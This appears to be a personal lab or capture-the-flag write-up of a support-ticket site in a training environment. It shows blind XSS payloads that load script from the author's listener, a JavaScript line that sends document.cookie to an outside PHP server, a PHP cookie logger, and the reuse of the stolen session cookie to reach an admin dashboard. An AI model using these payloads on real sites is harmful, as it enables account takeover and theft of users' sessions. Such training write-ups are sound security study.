## `support.inlanefreight.local`
- looks like `inlanefreight.local:8080` ![[images/Pasted image 20260628152057.png]]
- submit test ticket via `/ticket.php` ![[images/Pasted image 20260630122138.png]]
- `request:response` in burp ![[images/Pasted image 20260630122059.png]]
- the fact that someone will review the ticket soon indicates that it's going to be clicked
### Fuzzing
- directory![[images/Pasted image 20260630164638.png]]
- page ![[images/Pasted image 20260630164631.png]]
### Blind XSS
- based on the message we saw above, test for blind XSS with below
```javascript
"><script src=http://10.10.15.114:9000/TESTING_THIS></script>
```
![[images/Pasted image 20260630124030.png]]
- we got a call back to our listener ![[images/Pasted image 20260630124301.png]]
### session hijacking
- create `script.js` and `index.php`
```javascript
document.location='http://10.10.15.114:8081/index.php?c='+document.cookie;
```
```php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
```
- then, host above files via php
```bash
sudo php -S 0.0.0.0:8080
```
- inject the XSS into the message field
```javascript
"><script src=http://10.10.15.114:8081/script.js></script>
```
- got a hit on PHP server ![[images/Pasted image 20260630130201.png]]
- cookie output to `cookies.txt` ![[images/Pasted image 20260630130228.png]]
- browse to `login.php` amd open dev tools in firefox
- enter `session` as name and string as `value`, then reload the page ![[images/Pasted image 20260630164408.png]]
- we now have access to `dashboard.php` ![[images/Pasted image 20260630164427.png]]